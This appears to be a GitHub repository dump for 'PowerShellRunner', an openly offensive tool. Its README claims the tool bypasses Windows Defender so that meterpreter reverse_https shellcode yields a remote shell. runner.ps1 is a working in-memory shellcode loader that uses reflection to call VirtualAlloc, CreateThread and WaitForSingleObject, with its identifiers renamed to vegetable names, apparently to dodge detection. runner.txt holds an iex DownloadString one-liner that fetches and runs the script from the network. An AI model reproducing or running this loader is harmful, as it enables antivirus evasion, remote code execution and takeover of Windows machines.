├── README.md ├── runner.ps1 └── runner.txt /README.md: -------------------------------------------------------------------------------- 1 | # PowerShellRunner 2 | 3 | PowerShell script that utilizes WinAPI for bypassing Windows Defender implementation as of August 2, 2021. Using a msfvenom windows/x64/meterpreter/reverse_https ps1 shellcode will result in successful shell access. Shellcode should replace the placeholder in the script. 4 | 5 | -------------------------------------------------------------------------------- /runner.ps1: -------------------------------------------------------------------------------- 1 | function potatoes { 2 | Param ($cherries, $pineapple) 3 | $tomatoes = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') 4 | $turnips=@() 5 | $tomatoes.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$turnips+=$_}} 6 | return $turnips[0].Invoke($null, @(($tomatoes.GetMethod('GetModuleHandle')).Invoke($null, @($cherries)), $pineapple)) 7 | } 8 | function apples { 9 | Param ( 10 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func, 11 | [Parameter(Position = 1)] [Type] $delType = [Void] 12 | ) 13 | $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate]) 14 | $type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed') 15 | $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed') 16 | return $type.CreateType() 17 | } 18 | $cucumbers = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((potatoes kernel32.dll VirtualAlloc), (apples @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40) 19 | [Byte[]] $buf = 20 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $cucumbers, $buf.length) 21 | $parsnips = 22 | [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((potatoes kernel32.dll CreateThread), (apples @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$cucumbers,[IntPtr]::Zero,0,[IntPtr]::Zero) 23 | [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((potatoes kernel32.dll WaitForSingleObject), (apples @([IntPtr], [Int32]) ([Int]))).Invoke($parsnips, 0xFFFFFFFF) 24 | -------------------------------------------------------------------------------- /runner.txt: -------------------------------------------------------------------------------- 1 | iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dievus/PowerShellRunner/main/runner.ps1') 2 | --------------------------------------------------------------------------------